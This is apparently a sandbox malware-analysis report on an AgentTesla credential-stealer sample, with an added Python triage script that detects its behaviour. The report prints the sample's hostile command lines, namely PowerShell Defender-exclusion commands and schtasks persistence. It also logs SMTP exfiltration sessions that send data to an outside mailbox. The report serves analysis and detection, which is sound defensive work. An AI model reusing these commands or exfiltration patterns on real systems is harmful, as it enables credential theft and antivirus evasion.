Feb 9, 2023 19:40:58.851946115 CET | 8.8.8.8 | 192.168.2.7 | 0xd65b | No error (0) | mail.keefort.com.ec | keefort.com.ec | | CNAME (Canonical name) | IN (0x0001) | false
Feb 9, 2023 19:40:58.851946115 CET | 8.8.8.8 | 192.168.2.7 | 0xd65b | No error (0) | keefort.com.ec | | 88.99.90.21 | A (IP address) | IN (0x0001) | false
Feb 9, 2023 19:40:58.938018084 CET | 8.8.8.8 | 192.168.2.7 | 0xf7d6 | No error (0) | mail.keefort.com.ec | keefort.com.ec | | CNAME (Canonical name) | IN (0x0001) | false
Feb 9, 2023 19:40:58.938018084 CET | 8.8.8.8 | 192.168.2.7 | 0xf7d6 | No error (0) | keefort.com.ec | | 88.99.90.21 | A (IP address) | IN (0x0001) | false
                                                                                                                                    • api.ipify.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.7 | 49715 | 104.237.62.211 | 443 | C:\Users\user\Desktop\TTRef06022301.exe
Timestamp | kBytes transferred | Direction | Data
2023-02-09 18:40:25 UTC | 0 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
    Host: api.ipify.org
    Connection: Keep-Alive
2023-02-09 18:40:25 UTC | 0 | IN | HTTP/1.1 200 OK
    Content-Length: 11
    Content-Type: text/plain
    Date: Thu, 09 Feb 2023 18:40:25 GMT
    Vary: Origin
    Connection: close
2023-02-09 18:40:25 UTC | 0 | IN | Data Raw: 38 34 2e 31 37 2e 35 32 2e 31 33
    Data Ascii: 84.17.52.13


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.7 | 49718 | 173.231.16.76 | 443 | C:\Users\user\AppData\Roaming\iJyzakGsXF.exe
Timestamp | kBytes transferred | Direction | Data
2023-02-09 18:40:48 UTC | 0 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
    Host: api.ipify.org
    Connection: Keep-Alive
2023-02-09 18:40:49 UTC | 0 | IN | HTTP/1.1 200 OK
    Content-Length: 11
    Content-Type: text/plain
    Date: Thu, 09 Feb 2023 18:40:49 GMT
    Vary: Origin
    Connection: close
2023-02-09 18:40:49 UTC | 0 | IN | Data Raw: 38 34 2e 31 37 2e 35 32 2e 31 33
    Data Ascii: 84.17.52.13


Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Feb 9, 2023 19:40:34.706062078 CET | 587 | 49716 | 88.99.90.21 | 192.168.2.7 | 220-srv18.mihosting.com ESMTP Exim 4.95 #2 Thu, 09 Feb 2023 18:40:34 +0000
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
Feb 9, 2023 19:40:34.706923962 CET | 49716 | 587 | 192.168.2.7 | 88.99.90.21 | EHLO 376483
Feb 9, 2023 19:40:34.732095003 CET | 587 | 49716 | 88.99.90.21 | 192.168.2.7 | 250-srv18.mihosting.com Hello 376483 [84.17.52.13]
    250-SIZE 52428800
    250-8BITMIME
    250-PIPELINING
    250-PIPE_CONNECT
    250-AUTH PLAIN LOGIN
    250-STARTTLS
    250 HELP
Feb 9, 2023 19:40:34.733659029 CET | 49716 | 587 | 192.168.2.7 | 88.99.90.21 | AUTH login c3NnQGtlZWZvcnQuY29tLmVj
Feb 9, 2023 19:40:34.757739067 CET | 587 | 49716 | 88.99.90.21 | 192.168.2.7 | 334 UGFzc3dvcmQ6
Feb 9, 2023 19:40:34.912858963 CET | 587 | 49716 | 88.99.90.21 | 192.168.2.7 | 235 Authentication succeeded
Feb 9, 2023 19:40:34.913141966 CET | 49716 | 587 | 192.168.2.7 | 88.99.90.21 | MAIL FROM:<ssg@keefort.com.ec>
Feb 9, 2023 19:40:34.939181089 CET | 587 | 49716 | 88.99.90.21 | 192.168.2.7 | 250 OK
Feb 9, 2023 19:40:34.939482927 CET | 49716 | 587 | 192.168.2.7 | 88.99.90.21 | RCPT TO:<s4tivar@yandex.com>
Feb 9, 2023 19:40:34.973017931 CET | 587 | 49716 | 88.99.90.21 | 192.168.2.7 | 250 Accepted
Feb 9, 2023 19:40:34.973248959 CET | 49716 | 587 | 192.168.2.7 | 88.99.90.21 | DATA
Feb 9, 2023 19:40:34.996709108 CET | 587 | 49716 | 88.99.90.21 | 192.168.2.7 | 354 Enter message, ending with "." on a line by itself
Feb 9, 2023 19:40:35.013189077 CET | 49716 | 587 | 192.168.2.7 | 88.99.90.21 | .
Feb 9, 2023 19:40:35.045454025 CET | 587 | 49716 | 88.99.90.21 | 192.168.2.7 | 250 OK id=1pQBqU-00C1SA-SL
Feb 9, 2023 19:40:59.003160000 CET | 587 | 49721 | 88.99.90.21 | 192.168.2.7 | 220-srv18.mihosting.com ESMTP Exim 4.95 #2 Thu, 09 Feb 2023 18:40:58 +0000
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
Feb 9, 2023 19:40:59.009274960 CET | 49721 | 587 | 192.168.2.7 | 88.99.90.21 | EHLO 376483
Feb 9, 2023 19:40:59.034955025 CET | 587 | 49721 | 88.99.90.21 | 192.168.2.7 | 250-srv18.mihosting.com Hello 376483 [84.17.52.13]
    250-SIZE 52428800
    250-8BITMIME
    250-PIPELINING
    250-PIPE_CONNECT
    250-AUTH PLAIN LOGIN
    250-STARTTLS
    250 HELP
Feb 9, 2023 19:40:59.035612106 CET | 49721 | 587 | 192.168.2.7 | 88.99.90.21 | AUTH login c3NnQGtlZWZvcnQuY29tLmVj
Feb 9, 2023 19:40:59.059699059 CET | 587 | 49721 | 88.99.90.21 | 192.168.2.7 | 334 UGFzc3dvcmQ6
Feb 9, 2023 19:40:59.099977970 CET | 587 | 49721 | 88.99.90.21 | 192.168.2.7 | 235 Authentication succeeded
Feb 9, 2023 19:40:59.106488943 CET | 49721 | 587 | 192.168.2.7 | 88.99.90.21 | MAIL FROM:<ssg@keefort.com.ec>
Feb 9, 2023 19:40:59.130882978 CET | 587 | 49721 | 88.99.90.21 | 192.168.2.7 | 250 OK
Feb 9, 2023 19:40:59.132616997 CET | 49721 | 587 | 192.168.2.7 | 88.99.90.21 | RCPT TO:<s4tivar@yandex.com>
Feb 9, 2023 19:40:59.173305988 CET | 587 | 49721 | 88.99.90.21 | 192.168.2.7 | 250 Accepted
Feb 9, 2023 19:40:59.181783915 CET | 49721 | 587 | 192.168.2.7 | 88.99.90.21 | DATA
Feb 9, 2023 19:40:59.205801964 CET | 587 | 49721 | 88.99.90.21 | 192.168.2.7 | 354 Enter message, ending with "." on a line by itself
Feb 9, 2023 19:40:59.212526083 CET | 49721 | 587 | 192.168.2.7 | 88.99.90.21 | .
Feb 9, 2023 19:40:59.245584965 CET | 587 | 49721 | 88.99.90.21 | 192.168.2.7 | 250 OK id=1pQBqt-00C1XK-2p

                                                                                                                                    Target ID:0
                                                                                                                                    Start time:19:40:05
                                                                                                                                    Start date:09/02/2023
                                                                                                                                    Path:C:\Users\user\Desktop\TTRef06022301.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:C:\Users\user\Desktop\TTRef06022301.exe
                                                                                                                                    Imagebase:0x1b0000
                                                                                                                                    File size:791552 bytes
                                                                                                                                    MD5 hash:5478729E3225D4F158F811D03A8D4945
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                    Reputation:low

                                                                                                                                    Target ID:1
                                                                                                                                    Start time:19:40:12
                                                                                                                                    Start date:09/02/2023
                                                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TTRef06022301.exe
                                                                                                                                    Imagebase:0xe60000
                                                                                                                                    File size:430592 bytes
                                                                                                                                    MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                    Reputation:high

                                                                                                                                    Target ID:2
                                                                                                                                    Start time:19:40:12
                                                                                                                                    Start date:09/02/2023
                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    Imagebase:0x7ff6edaf0000
                                                                                                                                    File size:625664 bytes
                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high

                                                                                                                                    Target ID:3
                                                                                                                                    Start time:19:40:13
                                                                                                                                    Start date:09/02/2023
                                                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\iJyzakGsXF.exe"
                                                                                                                                    Imagebase:0xe60000
                                                                                                                                    File size:430592 bytes
                                                                                                                                    MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                    Reputation:high

                                                                                                                                    Target ID:4
                                                                                                                                    Start time:19:40:13
                                                                                                                                    Start date:09/02/2023
                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    Imagebase:0x7ff6edaf0000
                                                                                                                                    File size:625664 bytes
                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high

                                                                                                                                    Target ID:5
                                                                                                                                    Start time:19:40:13
                                                                                                                                    Start date:09/02/2023
                                                                                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iJyzakGsXF" /XML "C:\Users\user\AppData\Local\Temp\tmp685E.tmp"
                                                                                                                                    Imagebase:0xe10000
                                                                                                                                    File size:185856 bytes
                                                                                                                                    MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high

                                                                                                                                    Target ID:6
                                                                                                                                    Start time:19:40:13
                                                                                                                                    Start date:09/02/2023
                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    Imagebase:0x7ff6edaf0000
                                                                                                                                    File size:625664 bytes
                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high

                                                                                                                                    Target ID:7
                                                                                                                                    Start time:19:40:16
                                                                                                                                    Start date:09/02/2023
                                                                                                                                    Path:C:\Users\user\AppData\Roaming\iJyzakGsXF.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:C:\Users\user\AppData\Roaming\iJyzakGsXF.exe
                                                                                                                                    Imagebase:0xb0000
                                                                                                                                    File size:791552 bytes
                                                                                                                                    MD5 hash:5478729E3225D4F158F811D03A8D4945
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                    Reputation:low

                                                                                                                                    Target ID:8
                                                                                                                                    Start time:19:40:17
                                                                                                                                    Start date:09/02/2023
                                                                                                                                    Path:C:\Users\user\Desktop\TTRef06022301.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:C:\Users\user\Desktop\TTRef06022301.exe
                                                                                                                                    Imagebase:0x760000
                                                                                                                                    File size:791552 bytes
                                                                                                                                    MD5 hash:5478729E3225D4F158F811D03A8D4945
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                    Yara matches:
                                                                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.504076365.0000000002A8C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.504076365.0000000002A8C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    Reputation:low

                                                                                                                                    Target ID:17
                                                                                                                                    Start time:19:40:37
                                                                                                                                    Start date:09/02/2023
                                                                                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iJyzakGsXF" /XML "C:\Users\user\AppData\Local\Temp\tmpC6BA.tmp"
                                                                                                                                    Imagebase:0xe10000
                                                                                                                                    File size:185856 bytes
                                                                                                                                    MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                    Target ID:18
                                                                                                                                    Start time:19:40:38
                                                                                                                                    Start date:09/02/2023
                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    Imagebase:0x7ff6edaf0000
                                                                                                                                    File size:625664 bytes
                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                    Target ID:19
                                                                                                                                    Start time:19:40:38
                                                                                                                                    Start date:09/02/2023
                                                                                                                                    Path:C:\Users\user\AppData\Roaming\iJyzakGsXF.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Users\user\AppData\Roaming\iJyzakGsXF.exe
                                                                                                                                    Imagebase:0x1e0000
                                                                                                                                    File size:791552 bytes
                                                                                                                                    MD5 hash:5478729E3225D4F158F811D03A8D4945
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                    Target ID:20
                                                                                                                                    Start time:19:40:40
                                                                                                                                    Start date:09/02/2023
                                                                                                                                    Path:C:\Users\user\AppData\Roaming\iJyzakGsXF.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:C:\Users\user\AppData\Roaming\iJyzakGsXF.exe
                                                                                                                                    Imagebase:0xb60000
                                                                                                                                    File size:791552 bytes
                                                                                                                                    MD5 hash:5478729E3225D4F158F811D03A8D4945
                                                                                                                                    Has elevated privileges:false
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:.Net C# or VB.NET
                                                                                                                                    Yara matches:
                                                                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000014.00000002.504040549.0000000002F9C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000002.504040549.0000000002F9C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
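
A way to turn the process entries above into detection logic, as an added example that is not part of the Joe Sandbox report: the events are constructed from the command lines and file hashes shown for Target IDs 3, 4, 5, 7 and 8 (with the outer quotes the report display drops restored), and the three checks flag the Defender exclusion added through Add-MpPreference, the scheduled task registered from an XML file in the user's Temp directory, and the sample's copy executing from AppData\Roaming. The event shape, rule names and thresholds are this example's own assumptions, not the sandbox's.

```python
"""Triage checks for the process chain shown above (added example, not report code).

The events below are constructed from the command lines and MD5 hashes in the
report's process entries; in practice they would come from Sysmon Event ID 1
or Security 4688 process-creation records.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass(frozen=True)
class ProcEvent:
    target_id: int
    path: str      # image path on disk
    cmdline: str   # full command line as logged
    md5: str       # MD5 of the image file


# MD5 of the submitted sample (TTRef06022301.exe) from the report.
SAMPLE_MD5 = "5478729E3225D4F158F811D03A8D4945"

# Constructed from Target IDs 3, 4, 5, 7 and 8 of the report.
EVENTS = [
    ProcEvent(3, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
              r'Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\iJyzakGsXF.exe"',
              "DBA3E6449E97D4E3DF64527EF7012A10"),
    ProcEvent(4, r"C:\Windows\System32\conhost.exe",
              r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1",
              "EA777DEEA782E8B4D7C7C33BBF8A4496"),
    ProcEvent(5, r"C:\Windows\SysWOW64\schtasks.exe",
              r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iJyzakGsXF" '
              r'/XML "C:\Users\user\AppData\Local\Temp\tmp685E.tmp"',
              "15FF7D8324231381BAD48A052F85DF04"),
    ProcEvent(7, r"C:\Users\user\AppData\Roaming\iJyzakGsXF.exe",
              r"C:\Users\user\AppData\Roaming\iJyzakGsXF.exe", SAMPLE_MD5),
    ProcEvent(8, r"C:\Users\user\Desktop\TTRef06022301.exe",
              r"C:\Users\user\Desktop\TTRef06022301.exe", SAMPLE_MD5),
]

# Add-MpPreference with any of the exclusion switches (path, process, extension).
EXCLUSION_RE = re.compile(r"\bAdd-MpPreference\b.*?-Exclusion(?:Path|Process|Extension)\b", re.I)
TEMP_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.I)
ROAMING_RE = re.compile(r"\\AppData\\Roaming\\", re.I)


def win_split(cmdline: str) -> List[str]:
    """Split a Windows command line on whitespace, keeping quoted arguments whole."""
    return [tok.strip('"') for tok in re.findall(r'"[^"]*"|\S+', cmdline)]


def option_value(tokens: List[str], option: str) -> Optional[str]:
    """Return the argument following a /Option switch (case-insensitive), if any."""
    lowered = [t.lower() for t in tokens]
    if option.lower() in lowered:
        i = lowered.index(option.lower())
        if i + 1 < len(tokens):
            return tokens[i + 1]
    return None


def check_defender_exclusion(ev: ProcEvent) -> Optional[str]:
    """powershell.exe adding a Defender exclusion (what Target IDs 1 and 3 do)."""
    if ev.path.lower().endswith("powershell.exe") and EXCLUSION_RE.search(ev.cmdline):
        return "Defender exclusion added via Add-MpPreference"
    return None


def check_task_from_temp(ev: ProcEvent) -> Optional[str]:
    """schtasks /Create whose /XML definition lives under the user's Temp directory."""
    if not ev.path.lower().endswith("schtasks.exe"):
        return None
    tokens = win_split(ev.cmdline)
    if "/create" not in (t.lower() for t in tokens):
        return None
    xml = option_value(tokens, "/XML")
    if xml and TEMP_RE.search(xml):
        name = option_value(tokens, "/TN") or "?"
        return f"Scheduled task {name} created from XML in Temp: {xml}"
    return None


def check_roaming_self_copy(ev: ProcEvent, sample_md5: str = SAMPLE_MD5) -> Optional[str]:
    """A file with the sample's hash executing from AppData\\Roaming (the dropped copy)."""
    if ev.md5.upper() == sample_md5.upper() and ROAMING_RE.search(ev.path):
        return f"Sample copy running from {ev.path}"
    return None


def triage(events: List[ProcEvent]) -> List[Tuple[int, str]]:
    """Run every check over every event; returns (target_id, finding) pairs in event order."""
    findings = []
    for ev in events:
        for check in (check_defender_exclusion, check_task_from_temp, check_roaming_self_copy):
            msg = check(ev)
            if msg:
                findings.append((ev.target_id, msg))
    return findings


if __name__ == "__main__":
    for tid, msg in triage(EVENTS):
        print(f"Target {tid}: {msg}")
```

The task name "Updates\iJyzakGsXF" is chosen to look like a vendor updater, so the check keys on the /XML path under Temp rather than on the name; the Desktop process (Target ID 8) carries the same hash as the Roaming copy but is not flagged, since only the copy in a persistence location is of interest here.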


                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage:14.1%
                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                      Signature Coverage:0%
                                                                                                                                      Total number of Nodes:236
                                                                                                                                      Total number of Limit Nodes:10
                                                                                                                                      execution_graph: interactive node/edge dump, not recoverable as text. Windows API calls named in the graph: LoadLibraryExW, GetModuleHandleW, DuplicateHandle, CreateWindowExW, CallWindowProcW, SetWindowLongW, CreateActCtxA, GetCurrentProcess, GetCurrentThread, GetCurrentThreadId.
Memory Dump Source
• Source File: 00000000.00000002.263371665.0000000000AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_TTRef06022301.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3c0be7a73081b39babb44010bf7c5f8794cc3a872dc4839fb2215593baf3d68b
• Instruction ID: 9aa5520429fc24c3249df43183024d958452dd50bffc320f72da66b918f29f79
• Opcode Fuzzy Hash: 3c0be7a73081b39babb44010bf7c5f8794cc3a872dc4839fb2215593baf3d68b
• Instruction Fuzzy Hash: 24914B70B006058FCB44EF79C8A05AABBF6BF883007148979D40ADB756EB34ED15CB91
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.273637048.00000000027C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_27c0000_TTRef06022301.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 16ae8662467200aa347614f74482cff28fc9c9dd4582b0d13308608f8838e60f
• Instruction ID: 16d09ecdf3464667f64e50c7d91a33860eae4b2dafbb25be4828e02da764efa3
• Opcode Fuzzy Hash: 16ae8662467200aa347614f74482cff28fc9c9dd4582b0d13308608f8838e60f
• Instruction Fuzzy Hash: 18918035E0031ACFCB04DBF4C8549DEBBBAFF89300F258619E405AB2A5DB70A945CB90
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• GetCurrentProcess.KERNEL32 ref: 00ABC110
• GetCurrentThread.KERNEL32 ref: 00ABC14D
• GetCurrentProcess.KERNEL32 ref: 00ABC18A
• GetCurrentThreadId.KERNEL32 ref: 00ABC1E3
Memory Dump Source
• Source File: 00000000.00000002.263371665.0000000000AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_TTRef06022301.jbxd
Similarity
• API ID: Current$ProcessThread
• String ID:
• API String ID: 2063062207-0
• Opcode ID: 46f28a8febd5977a41874ae2715a71ee7ed63563dd636101eabe4dab5b5534b6
• Instruction ID: e8cc92abf6d64aacab3bd8f208020924089281ff5da17ffa72afc2e0b233457a
• Opcode Fuzzy Hash: 46f28a8febd5977a41874ae2715a71ee7ed63563dd636101eabe4dab5b5534b6
• Instruction Fuzzy Hash: 045165B0D003498FDB10CFAADA48BDEBBF4EB88314F208559E409B7252D7745884CF66
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• GetCurrentProcess.KERNEL32 ref: 00ABC110
• GetCurrentThread.KERNEL32 ref: 00ABC14D
• GetCurrentProcess.KERNEL32 ref: 00ABC18A
• GetCurrentThreadId.KERNEL32 ref: 00ABC1E3
Memory Dump Source
• Source File: 00000000.00000002.263371665.0000000000AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_TTRef06022301.jbxd
Similarity
• API ID: Current$ProcessThread
• String ID:
• API String ID: 2063062207-0
• Opcode ID: eca440029dcc6320695c6ce3c261db71a94a32102f8cc781ac331a6e7a2c6d7b
• Instruction ID: 875de24698ccb2ea0128882ca24be2a00d11392f7ae44f68db3f5675ab4858e3
• Opcode Fuzzy Hash: eca440029dcc6320695c6ce3c261db71a94a32102f8cc781ac331a6e7a2c6d7b
• Instruction Fuzzy Hash: 585143B0D007498FDB10CFAADA48BDEBBF4EB88314F208959E419B7251D7B45884CF66
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• GetModuleHandleW.KERNEL32(00000000), ref: 00AB9FF6
Memory Dump Source
• Source File: 00000000.00000002.263371665.0000000000AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_TTRef06022301.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
• Opcode ID: 17a73f25163a480bc8c1d1150edea82790371009d60d5838b2281c43fdc92a9e
• Instruction ID: b00f7ac20a6604cf20bb8b0008674e143c5008a888f2fc2947926845d19148d4
• Opcode Fuzzy Hash: 17a73f25163a480bc8c1d1150edea82790371009d60d5838b2281c43fdc92a9e
• Instruction Fuzzy Hash: FD712570A00B058FDB24DF2AD1517ABBBF9BF88310F00892DE54AD7A52DB75E845CB91
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• CreateActCtxA.KERNEL32(?), ref: 00AB5421
Memory Dump Source
• Source File: 00000000.00000002.263371665.0000000000AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_TTRef06022301.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
• Opcode ID: 72be74f085e5c58a4b2b2ac8d92b660660757a8d2b3f3fc4e25b6f5d8b21cee5
• Instruction ID: 0d78b1ca48a6bdaeda92b18d82bcf21807a191cd19b065e0fa5aa23b53e9157a
• Opcode Fuzzy Hash: 72be74f085e5c58a4b2b2ac8d92b660660757a8d2b3f3fc4e25b6f5d8b21cee5
• Instruction Fuzzy Hash: 92512371C00A59CFDB20CFAAC9447DEBBF9BF58304F2480AAD418AB252D7B55985CF90
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 027C090A
Memory Dump Source
• Source File: 00000000.00000002.273637048.00000000027C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_27c0000_TTRef06022301.jbxd
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0
• Opcode ID: db1878fc09bed450f367cb1c34d7cfc4f59c1e096d75f923f2680cb7a084b792
• Instruction ID: 684cc82f1113d662c91231f1c5729b53303f7487ad5526e22b6eb112afdc9fd6
• Opcode Fuzzy Hash: db1878fc09bed450f367cb1c34d7cfc4f59c1e096d75f923f2680cb7a084b792
• Instruction Fuzzy Hash: B051B2B1D00309DFDB14CFAAC884ADEBBB5BF48314F24822EE419AB210D7749985CF90
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• CallWindowProcW.USER32(?,?,?,?,?), ref: 027C2E71
Memory Dump Source
• Source File: 00000000.00000002.273637048.00000000027C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 027C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_27c0000_TTRef06022301.jbxd
Similarity
• API ID: CallProcWindow
• String ID:
• API String ID: 2714655100-0
• Opcode ID: 86f25dd0966bf268c325c21ce153007dab00e4924e39c125b127bce67b3b470c
• Instruction ID: 3516c90a8d07ca3a1ef4e1bc766e79bfd1e409e719029fd9ad8e85e6b6e6ff61
• Opcode Fuzzy Hash: 86f25dd0966bf268c325c21ce153007dab00e4924e39c125b127bce67b3b470c
• Instruction Fuzzy Hash: 684107B4A00215DFCB14CF99C498AAAFBF5FB88314F25855DD919A7321D774A841CFA0
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• CreateActCtxA.KERNEL32(?), ref: 00AB5421
Memory Dump Source
• Source File: 00000000.00000002.263371665.0000000000AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_TTRef06022301.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
• Opcode ID: aa75e31d95ddbb3b4115e6daaac01d54abc5e88bd9be45d7929d11885fed2b96
• Instruction ID: 4153c8055c5cce1698fef5cb16fc9a1924a6e8219ab5555c26b1e67abdc6d4fb
• Opcode Fuzzy Hash: aa75e31d95ddbb3b4115e6daaac01d54abc5e88bd9be45d7929d11885fed2b96
• Instruction Fuzzy Hash: AE4102B0C0065DCFDB24CFA9C944BCEBBBABF48304F608069D409AB251D7B56985CF90
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00ABC35F
                                                                                                                                      Memory Dump Source
